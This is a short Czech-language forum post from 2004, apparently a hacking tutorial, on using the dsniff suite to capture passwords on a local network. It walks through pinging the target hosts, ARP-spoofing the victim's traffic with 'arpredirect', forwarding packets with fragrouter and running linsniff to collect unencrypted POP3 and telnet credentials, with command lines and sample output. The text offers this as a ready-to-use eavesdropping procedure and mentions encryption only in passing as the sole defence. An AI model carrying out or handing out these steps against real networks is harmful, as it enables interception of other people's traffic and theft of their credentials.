Autor: .cCuMiNn. | 9.7.2004 |
Balik obsahuje krome dsniffu nekolik dalsich utilit ktere stoji za to vyzkouset. napr mailsnarf nebo webspy
V soucasne dobe filtrovanych sitich je nejnebezpecnejsi
utilitou arpredirect Proti druhu odposlouchavani hesel
za pomoci arpredirect a fragrouter neexistuje obrana krome
jedine a to je sifrovani provozu. Ale protokoly POP3 a telnet
sifrovane nejsou....
Jak vlastne pouzit ten arpredirect?
[twist] ping crush
PING 10.1.1.1 from 10.1.1.19:
56(84) bytes of data
64 bytes from 10.1.1.1: icmp_seq=0
ttl=128 time=1.3
[twister] ping shadow
PING 10.1.1.18 from
10.1.1.19 : 56(84) bytes of data
64 bytes from 10.1.1.18:
icmp_seq=0 ttl=255 time=5.2ms
To umozni twisteru zapamatovat si odpovidajici MAC adresy ktere potrebuje k presmerovani(zjisti MAc z IP)
[twister] arpredirect -t 10.1.1.18
10.1.1.1
intercepting traffic from 10.1.1.18 to
10.1.1.1 (^C to exit)
Tento prikaz spusti arp redirect a presmeruje
veskery tok dat ze systemu shadow urceny pro crush na twister.
Twister musi preposlat packety na crush takze musi mit zapnute
preposilani packetu . K tomu pouzijeme fragerouter(vsechny
utility jsou z dsniff)
(http://www.anzen.com/research/nidsbench/fragerouter.html)
fragerouter -B1
nakonec staci spustit analyzator
packetu..
linsniff
a muzeme cekat na nejake
zajimave informace.